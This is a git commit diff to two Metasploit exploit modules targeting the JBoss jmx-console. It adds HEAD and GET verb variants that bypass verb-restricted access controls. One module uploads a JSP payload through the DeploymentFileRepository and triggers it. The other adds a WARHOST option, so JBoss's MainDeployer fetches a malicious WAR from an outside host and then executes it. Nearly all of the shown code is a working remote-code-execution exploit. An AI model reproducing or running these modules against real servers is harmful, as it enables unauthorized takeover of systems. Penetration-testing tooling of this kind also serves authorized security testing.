make sure to use correct verbs, thanks mc!

git-svn-id: file:///home/svn/framework3/trunk@9285 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-05-11 16:20:46 +00:00
parent 4cfc84a2e4
commit 711e08b5e9
2 changed files with 75 additions and 30 deletions

View File

@ -67,21 +67,40 @@ class Metasploit3 < Msf::Exploit::Remote
fname = rand_text_alpha_upper(rand(5) + 1) fname = rand_text_alpha_upper(rand(5) + 1)
data = 'action=invokeOp'
data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
data << '&methodIndex=5'
data << '&arg0=' + Rex::Text.uri_encode(datastore['PATH'])
data << '&arg1=' + fname
data << '&arg2=.jsp'
data << '&arg3=' + Rex::Text.uri_encode(payload.encoded)
data << '&arg4=True'
if (datastore['VERB'] == "POST")
res = send_request_cgi( res = send_request_cgi(
{ {
'uri' => '/jmx-console/HtmlAdaptor', 'uri' => '/jmx-console/HtmlAdaptor',
'method' => datastore['VERB'], 'method' => datastore['VERB'],
'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' + 'data' => data
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
Rex::Text.uri_encode(payload.encoded) + '&arg4=True',
}) })
else
res = send_request_cgi(
{
'uri' => '/jmx-console/HtmlAdaptor;index.jsp?' + data,
'method' => datastore['VERB'],
})
end
if (res.code == 200) if (res.code == 200)
print_status("Triggering payload at '#{datastore['URI']}#{fname}.jsp'...") print_status("Triggering payload at '#{datastore['URI']}#{fname}.jsp'...")
verb = 'GET'
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
verb = 'HEAD'
end
send_request_raw( send_request_raw(
{ {
'uri' => datastore['URI'] + fname + '.jsp', 'uri' => datastore['URI'] + fname + '.jsp',
'method' => 'GET', 'method' => verb,
}) })
else else
print_error("Denied...") print_error("Denied...")

View File

@ -73,6 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]), OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console' ]), OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console' ]),
OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST' ]), OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST' ]),
OptString.new('WARHOST', [ false, 'The host to request the WAR payload from' ]),
], self.class) ], self.class)
end end
@ -149,7 +150,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Path' => resource_uri 'Path' => resource_uri
}}) }})
print_status("Making the request to the MainDeployer...") if (datastore['WARHOST'])
service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'] + resource_uri
end
#method_index = jboss_detect_method_index
print_status("Asking the JBoss server to deploy (via MainDeployer) #{service_url}")
if (datastore['VERB'] == "POST")
res = send_request_cgi({ res = send_request_cgi({
'method' => datastore['VERB'], 'method' => datastore['VERB'],
'uri' => datastore['PATH'] + '/HtmlAdaptor', 'uri' => datastore['PATH'] + '/HtmlAdaptor',
@ -163,7 +169,23 @@ class Metasploit3 < Msf::Exploit::Remote
#'methodIndex' => '23', # jboss 3.2.7 #'methodIndex' => '23', # jboss 3.2.7
'arg0' => service_url 'arg0' => service_url
} }
}, 20) })
else
res = send_request_cgi({
'method' => datastore['VERB'],
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_get' =>
{
'action' => 'invokeOp',
'name' => 'jboss.system:service=MainDeployer',
# deploy via java.net.URL
'methodIndex' => '3', # jboss 4.0.5
#'methodIndex' => '21', # jboss 3.0.8
#'methodIndex' => '23', # jboss 3.2.7
'arg0' => service_url
}
})
end
if (! res) if (! res)
raise RuntimeError, "Unable to deploy WAR archive [No Response]" raise RuntimeError, "Unable to deploy WAR archive [No Response]"
end end
@ -194,9 +216,13 @@ class Metasploit3 < Msf::Exploit::Remote
# EXECUTE # EXECUTE
# #
print_status("Executing #{app_base}...") print_status("Executing #{app_base}...")
verb = 'GET'
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
verb = 'HEAD'
end
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/' + app_base + '/' + jsp_name + '.jsp', 'uri' => '/' + app_base + '/' + jsp_name + '.jsp',
'method' => 'GET' 'method' => verb
}, 20) }, 20)
if (! res) if (! res)